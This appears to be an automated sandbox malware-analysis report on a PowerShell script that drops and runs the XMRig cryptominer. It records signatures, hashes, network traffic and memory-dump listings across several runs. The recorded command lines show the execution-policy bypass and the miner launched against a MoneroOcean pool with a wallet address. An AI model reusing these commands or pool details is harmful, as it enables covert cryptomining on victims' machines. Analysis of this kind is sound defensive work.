| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4860 wrote to memory of 2120 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4860 wrote to memory of 2120 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 184.28.176.34:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.176.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.89.13.in-addr.arpa | udp |
Files
memory/4860-0-0x00007FF9F2B33000-0x00007FF9F2B35000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kob5yxpy.axk.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4860-10-0x0000017DFD6B0000-0x0000017DFD6D2000-memory.dmp
memory/4860-11-0x00007FF9F2B30000-0x00007FF9F35F1000-memory.dmp
memory/4860-12-0x00007FF9F2B30000-0x00007FF9F35F1000-memory.dmp
memory/4860-14-0x00007FF9F2B30000-0x00007FF9F35F1000-memory.dmp
memory/4860-15-0x0000017DFE270000-0x0000017DFE282000-memory.dmp
memory/4860-16-0x0000017DFD740000-0x0000017DFD74A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2120-47-0x0000022B9C3D0000-0x0000022B9C3F0000-memory.dmp
memory/2120-48-0x0000022B9DCD0000-0x0000022B9DCF0000-memory.dmp
memory/2120-49-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-50-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/4860-51-0x00007FF9F2B33000-0x00007FF9F2B35000-memory.dmp
memory/4860-52-0x00007FF9F2B30000-0x00007FF9F35F1000-memory.dmp
memory/2120-54-0x0000022B9DD10000-0x0000022B9DD30000-memory.dmp
memory/2120-53-0x0000022B9DCF0000-0x0000022B9DD10000-memory.dmp
memory/4860-55-0x00007FF9F2B30000-0x00007FF9F35F1000-memory.dmp
memory/2120-56-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-57-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-58-0x0000022B9DCF0000-0x0000022B9DD10000-memory.dmp
memory/2120-59-0x0000022B9DD10000-0x0000022B9DD30000-memory.dmp
memory/2120-60-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-61-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-62-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-63-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-64-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-65-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-66-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-67-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-68-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-69-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-70-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-71-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-72-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-73-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-74-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-75-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-76-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-77-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-78-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-79-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-80-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-81-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-82-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-83-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-84-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-85-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-86-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-87-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-88-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-89-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-90-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-91-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-92-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-93-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-94-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-95-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-96-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-97-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-98-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-99-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-100-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-101-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-102-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-103-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-104-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-105-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-106-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-107-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-108-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-109-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-110-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-111-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-112-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-113-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-114-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-115-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-116-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-117-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
memory/2120-118-0x00007FF62AF90000-0x00007FF62BBC3000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:13
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3080 wrote to memory of 1036 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3080 wrote to memory of 1036 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.189.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/3080-3-0x00007FFA2E873000-0x00007FFA2E874000-memory.dmp
memory/3080-5-0x0000025580590000-0x00000255805B2000-memory.dmp
memory/3080-6-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
memory/3080-9-0x0000025580740000-0x00000255807B6000-memory.dmp
memory/3080-10-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k3i5pvc3.s22.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3080-25-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
memory/3080-48-0x00000255807C0000-0x00000255807D2000-memory.dmp
memory/3080-61-0x0000025580730000-0x000002558073A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1036-90-0x0000025858B00000-0x0000025858B20000-memory.dmp
memory/1036-91-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/3080-92-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
memory/3080-94-0x00007FFA2E873000-0x00007FFA2E874000-memory.dmp
memory/1036-93-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-95-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-96-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-97-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-98-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-99-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-100-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-101-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-102-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-103-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-104-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-105-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-106-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-107-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-108-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-109-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-110-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-111-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-112-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-113-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-114-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-115-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-116-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-117-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-118-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-119-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-120-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-121-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-122-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-123-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-124-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-125-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-126-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-127-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-128-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-129-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-130-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-131-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-132-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-133-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-134-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-135-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-136-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-137-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-138-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-139-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-140-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-141-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-142-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-143-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-144-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-145-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-146-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-147-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-148-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-149-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-150-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-151-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-152-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-153-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-154-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
memory/1036-155-0x00007FF7C2900000-0x00007FF7C3533000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:21
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
